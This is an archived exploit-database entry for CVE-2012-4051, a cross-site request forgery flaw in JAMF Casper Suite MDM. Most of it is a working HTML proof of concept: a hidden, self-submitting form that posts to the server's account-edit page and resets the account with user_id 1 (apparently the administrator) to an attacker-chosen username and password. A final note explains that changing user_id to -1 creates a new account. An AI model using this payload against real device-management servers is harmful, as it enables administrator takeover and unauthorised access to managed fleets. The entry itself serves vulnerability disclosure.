Skip to content
cyberexploits
webappjsptext

JAMF Casper Suite MDM - Cross-Site Request Forgery

JAMF Casper Suite MDM - Cross-Site Request Forgery

Publié le 2012-09-27

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/jsp/webapps/21545.txt7eac4c3a
raw
CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability



# Exploit Title: JAMF Software's Casper Suite MDM Solution CSRF

# Date: Discovered and reported July 2012

# Author: Jacob Holcomb/Gimppy042

# Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite)

# CVE : CVE-2012-4051 for the CSRF 





<head>

<title>PwNd JAMF Casper Admin CSRF BY:Jacob Holcomb</title>

</head>



<body>



<form name="csrf" 

action="https://CASPERSUITE_SERVER:8443/editAccount.html" method="post">

<input type="hidden" name="view" value="Save"/>

<input type="hidden" name="source" value="jss"/>

<input type="hidden" name="lastPage" value="editAccountGeneral.jsp"/>

<input type="hidden" name="lastTab" value="Account"/>

<input type="hidden" name="username" value="Gimppy"/>

<input type="hidden" name="realname" value="Pwnd"/>

<input type="hidden" name="email" value="Admin"/>

<input type="hidden" name="phone" value="Password"/>

<input type="hidden" name="password" value="pwnd1"/>

<input type="hidden" name="vpassword" value="pwnd1"/>

<input type="hidden" name="user_id" value="1"/>

</form>



<script>

document.csrf.submit();

</script>



</body>

</html>





If the HTML parameter/variable "user_id" is changed to a value of negative

one (-1) this request to the web server will create a new user.
Voir sur GitHub